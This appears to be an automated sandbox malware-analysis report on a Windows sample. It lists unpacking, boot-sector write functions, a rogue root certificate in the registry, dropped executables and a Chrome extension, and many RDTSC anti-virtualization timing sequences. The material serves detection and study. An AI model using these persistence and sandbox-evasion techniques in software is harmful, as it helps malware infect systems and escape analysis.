Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI1983.tmp.1.dr
Source: N1yprTBBXs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: N1yprTBBXs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: N1yprTBBXs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: N1yprTBBXs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: N1yprTBBXs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\N1yprTBBXs.exeUnpacked PE file: 0.2.N1yprTBBXs.exe.2750000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeUnpacked PE file: 2.2.6272167835D47591.exe.2880000.4.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeUnpacked PE file: 4.2.6272167835D47591.exe.2730000.5.unpack
Source: C:\Users\user\Desktop\N1yprTBBXs.exeCode function: 0_2_00414280 PathCombineW,LoadLibraryW,GetProcAddress,FreeLibrary,0_2_00414280
Source: N1yprTBBXs.exeStatic PE information: real checksum: 0x195ad2 should be: 0x4cf583
Source: MSI1983.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x2d22
Source: 6272167835D47591.exe.0.drStatic PE information: real checksum: 0x195ad2 should be: 0x4cf583
Source: C:\Users\user\Desktop\N1yprTBBXs.exeCode function: 0_2_004F001D push esp; ret 0_2_004F01CF
Source: C:\Users\user\Desktop\N1yprTBBXs.exeCode function: 0_2_004620E0 push ecx; mov dword ptr [esp], 00000000h0_2_004620E1
Source: C:\Users\user\Desktop\N1yprTBBXs.exeCode function: 0_2_004F01A7 push esp; ret 0_2_004F01CF
Source: C:\Users\user\Desktop\N1yprTBBXs.exeCode function: 0_2_00406260 push ecx; mov dword ptr [esp], 00000000h0_2_00406261
Source: C:\Users\user\Desktop\N1yprTBBXs.exeCode function: 0_2_004F6375 push ecx; ret 0_2_004F6388
Source: C:\Users\user\Desktop\N1yprTBBXs.exeCode function: 0_2_004F47DA push ecx; ret 0_2_004F47ED
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeCode function: 2_2_10010579 push ecx; ret 2_2_1001058C
Source: C:\Users\user\AppData\Roaming\1611970727133.exeCode function: 9_2_0040E2F1 push ecx; ret 9_2_0040E301
Source: C:\Users\user\AppData\Roaming\1611970727133.exeCode function: 9_2_0040E340 push eax; ret 9_2_0040E354
Source: C:\Users\user\AppData\Roaming\1611970727133.exeCode function: 9_2_0040E340 push eax; ret 9_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 25_2_00B13FB5 push ecx; ret 25_2_00B13FC8

Persistence and Installation Behavior:

Contains functionality to infect the boot sector
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d2_2_1001D7E0
Installs new ROOT certificates
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI1983.tmp
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\Desktop\N1yprTBBXs.exeFile created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Roaming\1611970727133.exe
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon.png
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon48.png
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.html
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\background.js
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\book.js
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\jquery-1.8.3.min.js
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.js
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\manifest.json

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d2_2_1001D7E0
Source: C:\Users\user\AppData\Roaming\1611970727133.exeCode function: 9_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_0040C41D
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1611970727133.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeCode function: 2_2_100204C02_2_100204C0
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFF03 second address: 00000000004EFF09 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C684h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFF31 second address: 00000000004EFF37 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFF56 second address: 00000000004EFF5C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C38C729h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F002E second address: 00000000004F0034 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C685h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F108C38C889h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0062 second address: 00000000004F0068 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0085 second address: 00000000004F008B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F00A5 second address: 00000000004F00AB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F00C7 second address: 00000000004F00CD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F00EF second address: 00000000004F00F5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C680h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0116 second address: 00000000004F011C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C686h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0142 second address: 00000000004F0148 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0167 second address: 00000000004F016D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0188 second address: 00000000004F018E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F018E second address: 00000000004F01B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C686h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F01B3 second address: 00000000004F01B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F01B9 second address: 00000000004F01DA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C681h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F01DA second address: 00000000004F01E0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F01E0 second address: 00000000004F0203 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C683h 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0203 second address: 00000000004F0209 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0209 second address: 00000000004F0226 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0226 second address: 00000000004F022C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F022C second address: 00000000004EFF9F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C38C3C8h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFF9F second address: 00000000004EFFA5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFFA5 second address: 00000000004EFFC3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFFC3 second address: 00000000004EFFC9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFFC9 second address: 00000000004EFFE5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFFE5 second address: 00000000004EFFEB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004EFFEB second address: 00000000004F0007 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0007 second address: 00000000004F000D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F000D second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C684h 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exeRDTSC instruction interceptor: First address: 00000000004F0275 second address: 00000000004F027B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFB01 second address: 00000000004EFB07 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFB07 second address: 00000000004EFB20 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ah 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFB20 second address: 00000000004EFB26 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFB26 second address: 00000000004EFB4B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE33h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 004EFE72h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFB4B second address: 00000000004EFB51 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFB51 second address: 00000000004EFB74 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE35h 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFB74 second address: 00000000004EFB7A instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFB7A second address: 00000000004EFB9B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFB9B second address: 00000000004EFBA1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFBA1 second address: 00000000004EFBC1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 004F06A6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFBC1 second address: 00000000004EFBC7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFBC7 second address: 00000000004EFBEA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE31h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 004EFED6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
